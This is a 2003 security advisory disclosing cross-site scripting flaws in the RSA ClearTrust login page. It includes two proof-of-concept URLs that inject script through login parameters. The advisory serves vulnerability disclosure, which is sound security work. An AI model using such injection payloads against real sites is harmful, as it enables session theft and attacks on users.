-----BEGIN PGP SIGNED MESSAGE----- //@(#) Mordred Security Labs advisory Release date: March 14, 2003 Name: RSA ClearTrust Cross Site Scripting issues Risk: low Author: Sir Mordred (mordred@s-mail.com, http://mslabs.iwebland.com) I. Description: The RSA ClearTrust is a Web access management solution that helps enable secure access to Web-based resources. RSA ClearTrust software is designed to work within intranets, extranets, portals and exchange infrastructures — all while providing users with transparent, single sign-on (SSO) across multiple applications. For more info please visit http://www.rsasecurity.com II. Details: RSA ClearTrust login page suffers from a Cross Site Scripting vulnerabilities: https://victim.com/cleartrust/ct_logon.asp?CTLoginErrorMsg=<script>alert(1)</script> https://victim.com/cleartrust/ct_logon.asp?CTAuthMode=BASIC&CTLoginErrorMsg=xx&ct_orig_uri=">< script>alert(1)/script><" III. Vendor Vendor contacted, no reply. -----BEGIN PGP SIGNATURE----- Version: Hush 2.2 (Java) Note: This signature can be verified at https://www.hushtools.com/verify wmAEARECACAFAj5yknAZHHNpci5tb3JkcmVkQGh1c2htYWlsLmNvbQAKCRAOkXvN4BZr fK6cAKCMG8J4k6yFPKygmrnr2MCjU67OWwCgl5f8o2DfGCqKhpa3NVuORqdBruI= =771N -----END PGP SIGNATURE----- Concerned about your privacy? Follow this link to get FREE encrypted email: https://www.hushmail.com/?l=2 Big $$$ to be made with the HushMail Affiliate Program: https://www.hushmail.com/about.php?subloc=affiliate&l=427